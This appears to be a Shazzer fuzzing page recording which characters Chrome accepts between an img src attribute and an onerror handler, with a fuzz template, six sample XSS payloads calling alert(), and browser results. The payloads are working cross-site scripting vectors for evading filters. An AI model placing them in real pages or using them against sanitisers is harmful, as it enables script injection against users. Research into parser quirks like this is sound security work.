Shazzer logo

Characters allowed before onerror events

Chrome logo 6

This XSS vector shows what characters can be used before the onerror event.

Created by: hackvertor

Created on: Saturday, March 30, 2024 at 9:40:05 PM

Updated on: Monday, May 26, 2025 at 6:26:23 AM


Category: HTML Parsing

Vector visibility: Public

Vector type: XSS

Vector charset: UTF-8

Template used:
<img src $[chr]onerror=log($[i])>
Detecting browser...

Sample payloads

<img src 0x09onerror=alert(9)>
<img src 
onerror=alert(10)>
<img src 0x0Conerror=alert(12)>
<img src 0x0Donerror=alert(13)>
<img src  onerror=alert(32)>
<img src /onerror=alert(47)>

Fuzz results

Chrome logo
Chrome 144.0.0.0 desktop Windows NT 10.0

Updated

Sat Jan 31 2026
Found 6 results
Loading...
Chrome logo
Chrome 143.0.0.0 desktop macOS 10.15.7older version

Updated

Sat Jan 31 2026
Found 6 results
Loading...
Chrome logo
Chrome 123.0.0.0 Unknown Unknownolder version

Updated

Sat Mar 30 2024
Found 6 results
Loading...